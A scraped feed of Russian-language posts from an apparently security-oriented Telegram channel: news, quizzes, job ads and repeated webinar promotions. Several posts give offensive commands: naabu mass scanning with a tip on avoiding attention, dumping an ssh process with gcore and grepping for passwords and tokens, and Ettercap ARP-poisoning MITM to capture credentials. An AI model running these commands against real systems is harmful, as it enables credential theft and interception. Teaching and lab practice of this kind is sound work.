В сентябре 2023 Рубен Сантамарта купил на eBay модули Teleperm XS и показал, что архитектурные и организационные просчёты открывают окно атаки — по симуляции расплав реактора возможен за 49 минут.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
💯5🤔3🔥2
Когда нужно быстро просканить сотни/тысячи хостов на открытые порты — без тормозов и лишнего шума.
Что умеет:
— Очень быстрый SYN/CONNECT (есть и базовый UDP)
— Автодедупликация IP при сканировании доменов
— Ввод: файл / CIDR / ASN / STDIN — вывод: TXT/JSON
— Лёгкая интеграция в пайплайн (httpx, nuclei, nmap)
Как запустить:
go install github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
naabu -l targets.txt -o open.txt
naabu -l targets.txt -rate 200 -verify -o verified.txt
naabu -l targets.txt | httpx -silent > alive_http.txt
naabu -l targets.txt -p u:53,123 -o udp_open.txt
💡 При сканах с домашнего IP снижайте
-rate`/`-timeout
— не привлекайте внимание.#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤2👏2
Please open Telegram to view this post
VIEW IN TELEGRAM
1💯6🌚2
Документальный фильм, который глубоко погружается в скандал с Cambridge Analytica и раскрывает, как социальные сети используют данные пользователей для манипулирования мнением людей.
Почему стоит посмотреть:
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍2
Какой неожиданный канал утечки данных реально существует ❓
Anonymous Quiz
13%
Через фото на аватарке
24%
Через QR-коды
25%
Через favicon
38%
Через светодиоды маршрутизатора
😁4👾1
This media is not supported in your browser
VIEW IN TELEGRAM
📅 24 сентября в 19:00 МСК — бесплатный вебинар с Максимом Шаланкиным.
Тема: «ИИ-агенты: новая фаза развития искусственного интеллекта».
🔹 Почему все говорят про ИИ-агентов и куда вливаются миллиарды инвестиций.
🔹 Чем они отличаются от ChatGPT и обычных ботов.
🔹 Как работает цикл агента: восприятие → планирование → действие → обучение.
🔹 Живое демо простого агента.
🔹 Потенциал для бизнеса: автоматизация процессов и ROI до 80%.
Не придёшь — будешь потом рассказывать, что «агенты — это как чат-боты», и ловить косые взгляды от коллег 😏
👉 Регистрируйтесь через форму на лендинге
Тема: «ИИ-агенты: новая фаза развития искусственного интеллекта».
🔹 Почему все говорят про ИИ-агентов и куда вливаются миллиарды инвестиций.
🔹 Чем они отличаются от ChatGPT и обычных ботов.
🔹 Как работает цикл агента: восприятие → планирование → действие → обучение.
🔹 Живое демо простого агента.
🔹 Потенциал для бизнеса: автоматизация процессов и ROI до 80%.
Не придёшь — будешь потом рассказывать, что «агенты — это как чат-боты», и ловить косые взгляды от коллег 😏
👉 Регистрируйтесь через форму на лендинге
👏4
Иногда у вас есть доступ к sudo, но нет полноценного рута. В таких случаях можно попробовать вытащить секреты прямо из памяти процесса:
pidof ssh && sudo gcore -o dump $(pidof ssh)
strings dump.* | grep -i password
pidof ssh
— получаем PID целевого процессаsudo gcore -o dump
— снимаем дамп памятиstrings ... | grep
— вытаскиваем строки с паролями💡 Можно найти: пароли, токены, ключи, строки подключения к базам и конфиденциальные переменные.
⚡ Лайфхаки:
— Меняй ssh на любой процесс, где потенциально может быть секрет (например, postgres, nginx, java)
— Можно заменить grep -i password на grep -Ei 'token|secret|aws|bearer'
— Работает без установки дополнительных утилит, только sudo и gcore (есть в gdb)
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍2
⚡️ Бесплатный вебинар — ИИ-агенты: новая фаза развития AI
24 сентября в 19:00 МСК состоится бесплатный вебинар с Максимом Шаланкиным — Data Science Team Lead в финтех-команде MWS, а познакомиться с ним ближе можно в его тг-канале.
Тема:
На вебинаре разберёмся, почему агенты — это следующий шаг после ChatGPT, чем они отличаются от обычных моделей и как уже приносят бизнесу ROI до 80%. А дальше я покажу, как эта тема ложится в наш курс по ИИ-агентам, который разработан под руководством Никиты Зелинского.
Подробности рассказываем в гс выше — включай, чтобы не пропустить.
24 сентября в 19:00 МСК состоится бесплатный вебинар с Максимом Шаланкиным — Data Science Team Lead в финтех-команде MWS, а познакомиться с ним ближе можно в его тг-канале.
Тема:
«ИИ-агенты: новая фаза развития искусственного интеллекта».
На вебинаре разберёмся, почему агенты — это следующий шаг после ChatGPT, чем они отличаются от обычных моделей и как уже приносят бизнесу ROI до 80%. А дальше я покажу, как эта тема ложится в наш курс по ИИ-агентам, который разработан под руководством Никиты Зелинского.
Подробности рассказываем в гс выше — включай, чтобы не пропустить.
👍3
В первой подборке — обязательные инструменты для:
WPScan, sqlmap, Nikto
WhatWeb, Wig, testssl.sh, whois
Nmap, traceroute, ping
В статье приведены команды и примеры запуска — можно сразу проверить работу инструментов в WSL.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤3🔥2🥱1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7🌚5
Обширный репозиторий с гайдами, заметками и ссылками по этичному взлому. Тысячи материалов: чек-листы, техники атак и разборы уязвимостей.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥1
🔐 PowerShell в атаке и защите
Инструмент админов, который часто используют и хакеры. Подборка поможет разобраться: как работать с PowerShell, какие есть техники атак и как их обнаруживать.
➡️ Курс PowerShell — видеоформат, практические примеры и быстрый вход в тему.
➡️ Pluralsight — cтруктурированный трек с курсами и лабораториями для системного погружения в offensive-аспекты.
➡️ Nishang — набор PowerShell-скриптов для offensive-задач
➡️ Microsoft Docs — официальная документация по встроенным механизмам безопасности и настройкам логирования — обязательно для защитников.
➡️ Threat detection guidance — практические рекомендации по детекции PowerShell-активности, AMSI-байпасам и шаблонам поведения злоумышленников.
➡️ Windows Events для PowerShell-детекции — гайд по тому, какие Windows-события отправлять в SIEM и как строить аналитики для PowerShell-охоты.
🐸 Библиотека хакера
#свежак
Инструмент админов, который часто используют и хакеры. Подборка поможет разобраться: как работать с PowerShell, какие есть техники атак и как их обнаруживать.
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥3❤2👍2
Сервис принимает XML без отключения внешних сущностей.
Какой основной риск? Голосуйте реакцией
🔥 — Только DoS через «Billion Laughs»
👾 — Утечка локальных файлов / SSRF
❤️ — Ошибка схемы и падение парсера
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
👾18❤2🔥1
Security Рartner (BiSO) — от 430 000 ₽, удаленно (Минск)
Технический менеджер ИБ — удаленно/гибрид (Москва)
IT & SecOps Team Lead — office (Cyrpus)
Инженер по технической защите информации — гибрид (Екатеринбург)
Специалист по Cybersecurity (Стажировка) — удаленно (Коста-Рика)
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥1
🔥 Не пропустите событие осени для AI-комьюнити
24 сентября, 19:00 Мск — бесплатный вебинар с Максимом Шаланкиным «ИИ-агенты: новая фаза развития искусственного интеллекта»
😤 Пока все спорят, «боты это или нет», мы покажем, как работают настоящие агенты: с планированием, инструментами и памятью. За час Максим разберёт:
— почему ИИ-агенты сейчас на пике инвестиций
— чем они отличаются от ChatGPT и обычных моделей
— цикл агента: восприятие → планирование → действие → обучение
— живое демо простого агента
— как бизнес уже получает ROI до 80%
⚡️ Хотите спросить у Максима всё, что обычно остаётся «за кадром»? Ловите шанс — только в прямом эфире.
⏰ Мест мало, регистрация закроется, как только забьём комнату
24 сентября, 19:00 Мск — бесплатный вебинар с Максимом Шаланкиным «ИИ-агенты: новая фаза развития искусственного интеллекта»
😤 Пока все спорят, «боты это или нет», мы покажем, как работают настоящие агенты: с планированием, инструментами и памятью. За час Максим разберёт:
— почему ИИ-агенты сейчас на пике инвестиций
— чем они отличаются от ChatGPT и обычных моделей
— цикл агента: восприятие → планирование → действие → обучение
— живое демо простого агента
— как бизнес уже получает ROI до 80%
⚡️ Хотите спросить у Максима всё, что обычно остаётся «за кадром»? Ловите шанс — только в прямом эфире.
⏰ Мест мало, регистрация закроется, как только забьём комнату
👏1
Для локальных исследований и тестов (в своей лаборатории!) Ettercap — проверенный инструмент для MITM, сниффинга и инъекций пакетов.
— ARP-spoofing / ARP-poisoning для установки MITM;
— DNS-spoofing (подмена ответов);
— перехват протоколов (HTTP, FTP, POP, SMTP и т.д.);
— фильтры/плагины для автоматической модификации пакетов.
sudo ettercap -G # графический интерфейс
sudo ettercap -T -M arp /192.168.1.5/ /192.168.1.1/ # ARP MITM: хост <-> шлюз
Результат в UI либо в логах
(/var/log/ettercap/)
, в реальном времени можно наблюдать перехваченные креденшелы и HTTP-сессии.— Тренируйтесь в изолированной лаборатории (VM или отдельная подсеть).
— Комбинируйте с Wireshark для глубокого анализа и с etterfilter для автоматической модификации.
— На реальных сетях некоторые роутеры/защитные механизмы блокируют ARP-spoofing — проверяйте окружение.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤2👏1
В сентябре через фишинг взломали аккаунты мейнтейнеров и выпустили заражённые версии популярных пакетов (
debug, chalk, ansi-styles, @ctrl/tinycolor).
Зловред действовал как червь: крал токены/ключи, внедрял скрытые GitHub Actions и самопубликовался.
#breach_breakdown
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3👍1🌚1
В ней — всё необходимое для повседневных задач: от переключения режимов до работы с буферами и вкладками.
#cheat_sheet #vim
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🔥2